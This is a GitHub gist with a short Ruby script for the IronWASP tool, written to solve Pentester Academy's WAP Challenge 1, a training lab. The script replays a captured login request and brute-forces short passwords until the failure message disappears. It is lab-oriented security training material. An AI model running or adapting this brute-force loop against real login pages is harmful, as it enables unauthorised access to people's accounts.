Last active
December 26, 2015 16:39
-
-
Save Lavakumar/7181529 to your computer and use it in GitHub Desktop.
Ruby script written using IronWASP APIs to solve Pentester Academy's WAP Challenge -1. Link to challenge - http://www.pentesteracademy.com/video?id=153
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Script to help solve http://www.pentesteracademy.com/video?id=153 | |
#This script can be run from the multi-line scripting shell of IronWASP v0.9.7.2 and above | |
#Make sure the scripting shell language is selected as Ruby before executing | |
#The log id value here is one 1. The id value must point to the log containing the login request | |
r = Request.from_proxy_log(1) | |
r.query.set("email", "jack@pentesteracademy.com") | |
bf = BruteForcer.new("xyz", 5,5) | |
while bf.has_more | |
password = bf.get_next | |
r.query.set("password", password) | |
res = r.send_req | |
if not res.body_string.include? "Failed! Please try again!" | |
puts "Password is - " + password | |
break | |
else | |
puts password | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment